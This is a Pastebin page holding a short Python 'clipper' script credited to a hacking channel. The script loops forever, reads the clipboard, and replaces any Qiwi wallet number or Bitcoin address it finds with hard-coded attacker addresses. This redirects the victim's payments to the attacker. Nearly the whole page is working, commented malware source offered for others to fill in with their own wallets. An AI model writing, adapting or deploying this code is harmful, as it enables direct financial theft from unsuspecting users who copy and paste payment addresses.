Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #########################################
- # #
- # Channel: @hackingtipp (HACKFREAKS OFFICIAL) #
- # #
- # BY : HACKFREAKS #
- # #
- #########################################
- import pyperclip # Import a library for working with the clipboard
- from time import sleep # Import of a library to stop the program for a while
- country_code1 = '7' # 1st Country Code Option
- country_code2 = '8' # 2nd Country Code Option
- qiwi_rus_with_plus = '+73125424323' # Your Qiwi with a plus
- qiwi_rus_without_plus = '83125424323' # Your Qiwi without plus
- btc = '17weRxSXdU37uwhC5q4kShq3cnMkxYft6a' # Your BTC Address
- btc_len = [26, 27, 28, 29, 30, 31, 32, 33, 34, 35] # don't touch
- # Endless cycle
- while True:
- clipboard = pyperclip.paste() # Get the contents of the clipboard
- # If content length = wallet length without plus and content is not equal to wallet without plus, then ...
- if len(clipboard) == len(qiwi_rus_without_plus) and clipboard != qiwi_rus_without_plus:
- # If country codes are in content, then ...
- if country_code1 in clipboard or country_code2 in clipboard:
- pyperclip.copy(qiwi_rus_without_plus) # We put our own kiwi in the buffer without a plus
- # If content length = plus wallet length and content is not equal to plus wallet, then ...
- elif len(clipboard) == len(qiwi_rus_with_plus) and clipboard != qiwi_rus_with_plus:
- # If + is in the contents of the buffer, then ...
- if '+' in clipboard:
- pyperclip.copy(qiwi_rus_with_plus) # We put our kiwi with a plus in the buffer to the user
- # If the wallet length is from 26 to 35 and the first character is 1 or 3, then ...
- elif len(clipboard) in btc_len and (clipboard[0] == '1' or clipboard[0] == '3'):
- # If the content is not equal to our BTC-Address, then ...
- if clipboard != btc:
- pyperclip.copy(btc) # Put your bitcoin address in the buffer for the user
- sleep(1) # Pause for 1 second
Advertisement
Add Comment
Please, Sign In to add comment